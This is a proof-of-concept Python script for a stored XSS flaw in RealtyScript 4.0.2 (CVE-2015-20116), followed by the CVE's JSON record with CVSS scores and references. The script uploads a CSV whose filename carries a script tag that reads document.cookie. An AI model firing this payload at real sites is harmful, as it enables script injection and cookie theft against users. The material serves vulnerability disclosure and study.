CVE-2015-20116

#!/usr/bin/env python3 # CVE-2015-20116 PoC - RealtyScript CSV File Upload XSS # This PoC demonstrates uploading a file with malicious XSS payload in filename import requests import sys target_url = "http://target.com/upload" # Replace with actual target URL # XSS payload embedded in filename malicious_filename = '<script>alert(document.cookie)</script>.csv' def exploit_csv_xss(): """Upload CSV file with XSS payload in filename""" try: files = { 'file': (malicious_filename, 'test,data\n1,2', 'text/csv') } response = requests.post(target_url, files=files) print(f"[*] Request sent with malicious filename: {malicious_filename}") print(f"[*] Response Status: {response.status_code}") if response.status_code == 200: print("[+] File uploaded successfully - XSS payload stored") print("[+] When file is displayed, the script will execute in victim's browser") else: print("[-] Upload failed") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": exploit_csv_xss()

{"cve": {"id": "CVE-2015-20116", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:47.077", "lastModified": "2026-03-19T14:12:28.390", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Next Click Ventures RealtyScript 4.0.2 fails to properly sanitize CSV file uploads, allowing attackers to inject malicious scripts through filename parameters in multipart form data. Attackers can upload files with XSS payloads in the filename field to execute arbitrary JavaScript in users' browsers when the file is processed or displayed."}, {"lang": "es", "value": "Next Click Ventures RealtyScript 4.0.2 no sanea correctamente las subidas de archivos CSV, permitiendo a los atacantes inyectar scripts maliciosos a través de parámetros de nombre de archivo en datos de formulario multipart. Los atacantes pueden subir archivos con cargas útiles de XSS en el campo de nombre de archivo para ejecutar JavaScript arbitrario en los navegadores de los usuarios cuando el archivo es procesado o mostrado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nextclickventures:realtyscript:4.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "237FBCF4-383B-4460-82EF-FC61A749D53B"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/38496", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/realtyscript-stored-cross-site-scripting-via-csv-file-upload-filename", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5269.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}